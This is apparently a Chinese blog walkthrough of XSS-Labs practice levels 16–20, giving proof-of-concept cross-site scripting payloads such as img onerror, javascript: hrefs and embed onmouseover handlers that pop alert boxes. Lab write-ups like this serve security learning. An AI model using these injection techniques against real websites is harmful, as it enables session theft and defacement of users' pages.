【XSS-Labs】关卡 16-20

Level 16

同15,利用img标签的报错事件
【XSS-Labs】关卡 16-20_第1张图片
POC:

<img src="" onerror="alert(1)">

Level 17

点击页面超链接,结果成功进入下一关
在这里插入图片描述
修改源码中该超链接 a 标签中的 href 为:javascript:alert(1),点击成功绕过
【XSS-Labs】关卡 16-20_第2张图片
POC:

<a href="javascript:alert(1)">……a>

Level 18

只有一个embed标签,发现使用url进行传参
【XSS-Labs】关卡 16-20_第3张图片
尝试利用传参 和 鼠标事件onmouseover(鼠标移动至指定元素触发)来触发弹窗,成功触发
【XSS-Labs】关卡 16-20_第4张图片
POC:

arg02= onmouseover=alert(1)

Level 19

19同18,但是与18不一样的是不会自动识别关键字,如onmouseover,只会当作普通文本
在这里插入图片描述
尝试闭合发现已经对引号做了实体编码处理
在这里插入图片描述
因此手动添加鼠标事件onmouseover=alert(1),成功触发
【XSS-Labs】关卡 16-20_第5张图片
POC:

<embed src="……" onmouseover="alert(1)">

Level 20

同20,手动添加onmouseover=alert(1)事件
【XSS-Labs】关卡 16-20_第6张图片

总结:

  • 关卡16:同15,利用img标签的空src报错事件onerror来触发
<img src="" onerror="alert(1)">
  • 关卡17:利用a标签中的href参数,添加javascript解析
<a href="javascript:alert(1)">……a>
  • 关卡18 - 20:利用mebed标签的鼠标事件onmouseover,来添加触发弹窗
<embed src="……" onmouseover="alert(1)">

你可能感兴趣的:(#,XSS-Labs)